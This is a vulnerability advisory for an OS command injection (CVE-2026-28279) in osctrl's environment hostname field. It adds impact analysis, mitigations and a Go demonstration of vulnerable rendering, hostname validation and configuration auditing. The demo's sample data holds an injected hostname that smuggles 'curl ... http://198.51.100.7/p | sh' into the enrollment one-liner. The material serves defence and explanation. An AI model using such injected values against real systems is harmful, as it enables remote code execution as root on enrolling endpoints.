CVE-2026-28279: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in jmpsec osctrl
osctrl is an osquery management solution. Prior to version 0.5.0, an OS command injection vulnerability exists in the `osctrl-admin` environment configuration. An authenticated administrator can inject arbitrary shell commands via the hostname parameter when creating or editing environments. These commands are embedded into enrollment one-liner scripts generated using Go's `text/template` package (which does not perform shell escaping) and execute on every endpoint that enrolls using the compromised environment. An attacker with administrator access can achieve remote code execution on every endpoint that enrolls using the compromised environment. Commands execute as root/SYSTEM (the privilege level used for osquery enrollment) before osquery is installed, leaving no agent-level audit trail. This enables backdoor installation, credential exfiltration, and full endpoint compromise. This is fixed in osctrl `v0.5.0`. As a workaround, restrict osctrl administrator access to trusted personnel, review existing environment configurations for suspicious hostnames, and/or monitor enrollment scripts for unexpected commands.
AI Analysis
Technical Summary
CVE-2026-28279 affects jmpsec's osctrl, an osquery management solution, in versions before 0.5.0. It is an OS command injection flaw (CWE-78) in the osctrl-admin environment configuration interface: an authenticated administrator can put arbitrary shell commands into the hostname parameter when creating or editing an environment. That hostname is rendered into the enrollment one-liner script with Go's text/template package, which substitutes values verbatim and performs no escaping at all (its sibling html/template escapes for HTML contexts, and neither package knows anything about shell quoting), so the injected text becomes part of the command line the endpoint runs. Every endpoint that enrolls with the compromised environment therefore executes the injected commands as root or SYSTEM, before osquery is installed, and because no agent exists yet at that point there is no agent-level audit log of what ran. This gives an attacker the ability to install persistent backdoors, exfiltrate credentials and fully compromise endpoints. Exploitation requires high privileges (osctrl administrator access) and depends on endpoints subsequently enrolling with the tampered environment, but its scope is broad because it reaches every endpoint that enrolls. The issue is fixed in osctrl 0.5.0. No exploitation in the wild is reported, but the impact potential is significant because of the privilege level and the stealth of pre-agent execution. Workarounds are to restrict administrator access to trusted personnel, audit environment configurations for hostname values that contain anything other than a plain hostname, and monitor generated enrollment scripts for unexpected commands.
Potential Impact
This vulnerability enables attackers with administrator access to achieve remote code execution on all endpoints enrolling with a compromised environment, executing commands as root or SYSTEM before osquery installation. This can lead to complete endpoint compromise, including backdoor installation, credential theft, and lateral movement within networks. The lack of agent-level audit trails during execution increases stealth, making detection and forensic analysis difficult. Organizations using osctrl for osquery management face risks of widespread compromise across their endpoint fleet, potentially affecting sensitive data confidentiality, system integrity, and availability. The attack requires administrator privileges on osctrl, so insider threats or compromised administrator accounts pose the greatest risk. The vulnerability's exploitation could severely disrupt enterprise security monitoring and incident response capabilities, as osquery is often used for endpoint visibility and threat detection.
Mitigation Recommendations
1. Upgrade osctrl to version 0.5.0 or later to apply the official fix.
2. Restrict osctrl administrator access to trusted, vetted personnel; that is the only role able to reach the vulnerable parameter.
3. Audit the hostname value of every existing environment. A legitimate value is a bare hostname (letters, digits, hyphens and dots); quotes, semicolons, backticks, `$(`, pipes, `&&`, whitespace or an embedded URL in the field are indicators of tampering.
4. Before pointing new endpoints at an environment, fetch the enrollment one-liner osctrl generates for it and compare it with the expected script; any command beyond the expected download-and-execute sequence is suspect.
5. Require multi-factor authentication and strong access controls on the osctrl administrative interface so that a stolen password alone does not yield administrator access.
6. Use network segmentation and endpoint protection to limit the blast radius if an endpoint is compromised.
7. Log and alert on environment changes and enrollment activity outside the osquery agents themselves (for example at the osctrl server or its reverse proxy), since the injected commands run before any agent exists.
8. Educate administrators on secure configuration practices and the risks of command injection.
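The following Go program is an added example, not osctrl's own code, that illustrates both the mechanism described in the Technical Summary and the audit step in the Mitigation Recommendations. The enrollment template, the Env field names and the URL layout are assumptions made for the demonstration (osctrl's real template is not shown on this page); the sample environments and the injected hostname are constructed. It renders the one-liner with text/template exactly as the advisory describes, shows the injected hostname surviving verbatim, then applies a strict RFC 1123 hostname check before rendering and reuses that check to flag stored environments whose hostname is not a plain hostname. Whether v0.5.0 fixes the issue in precisely this way is not stated on the page.

```go
package main

import (
	"bytes"
	"errors"
	"fmt"
	"regexp"
	"text/template"
)

// enrollTemplate is a hypothetical stand-in for an osctrl enrollment
// one-liner. osctrl's real template, field names and URL layout are not shown
// on this page; what matters is that text/template substitutes .Hostname
// verbatim, with no shell escaping.
const enrollTemplate = `curl -sk "https://{{.Hostname}}/{{.Environment}}/{{.Secret}}/enroll.sh" | sh`

// Env holds the environment fields the template consumes (assumed names).
type Env struct {
	Environment string
	Hostname    string
	Secret      string
}

// renderUnsafe reproduces the vulnerable pattern: the admin-supplied Hostname
// goes straight into the script, quotes, semicolons and all.
func renderUnsafe(e Env) (string, error) {
	t, err := template.New("enroll").Parse(enrollTemplate)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, e); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// hostnameRE accepts only RFC 1123 hostnames: dot-separated labels of
// letters, digits and hyphens, 1-63 chars each, no leading/trailing hyphen.
var hostnameRE = regexp.MustCompile(
	`^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$`)

var ErrBadHostname = errors.New("hostname is not a valid RFC 1123 name")

// validateHostname is an allow-list check (one hardening approach; not
// necessarily the exact fix shipped in v0.5.0): anything that is not a plain
// hostname, such as shell metacharacters, spaces, quotes, a port or a path,
// is rejected before it can reach the template.
func validateHostname(h string) error {
	if len(h) == 0 || len(h) > 253 || !hostnameRE.MatchString(h) {
		return ErrBadHostname
	}
	return nil
}

// renderSafe validates first, then renders with the same template.
func renderSafe(e Env) (string, error) {
	if err := validateHostname(e.Hostname); err != nil {
		return "", err
	}
	return renderUnsafe(e)
}

// auditHostnames is the "review existing environment configurations" step
// from the workaround: it returns the names of environments whose stored
// hostname would not pass validateHostname, in input order.
func auditHostnames(envs []Env) []string {
	var flagged []string
	for _, e := range envs {
		if validateHostname(e.Hostname) != nil {
			flagged = append(flagged, e.Environment)
		}
	}
	return flagged
}

func main() {
	// Constructed sample environments; the second carries an injected
	// hostname that closes the quoted URL, runs a second command, and
	// comments out the rest of the line.
	envs := []Env{
		{Environment: "prod", Hostname: "osctrl.example.com", Secret: "s3cret"},
		{Environment: "lab", Hostname: `osctrl.example.com"; curl -s http://198.51.100.7/p | sh; #`, Secret: "s3cret"},
	}
	for _, e := range envs {
		out, _ := renderUnsafe(e)
		fmt.Printf("[%s] vulnerable render: %s\n", e.Environment, out)
		if _, err := renderSafe(e); err != nil {
			fmt.Printf("[%s] hardened render rejected: %v\n", e.Environment, err)
		}
	}
	fmt.Println("environments to review:", auditHostnames(envs))
}
```

The "lab" environment's rendered one-liner reads `curl -sk "https://osctrl.example.com"; curl -s http://198.51.100.7/p | sh; #/lab/s3cret/enroll.sh" | sh`: the original curl still runs, the attacker's payload runs next, and the `#` hides the remainder, which is why an operator reading only the tail of a script can miss it. Validating the field as a hostname rather than trying to quote it for the shell sidesteps the question of which shell or platform will interpret the one-liner.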
Affected Countries
United States, Germany, United Kingdom, Canada, Australia, France, Netherlands, Japan, South Korea, India
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-02-26T01:52:58.734Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 69a0d31032ffcdb8a2667dff
Added to database: 2/26/2026, 11:11:12 PM
Last enriched: 2/26/2026, 11:25:23 PM
Last updated: 4/13/2026, 6:00:22 AM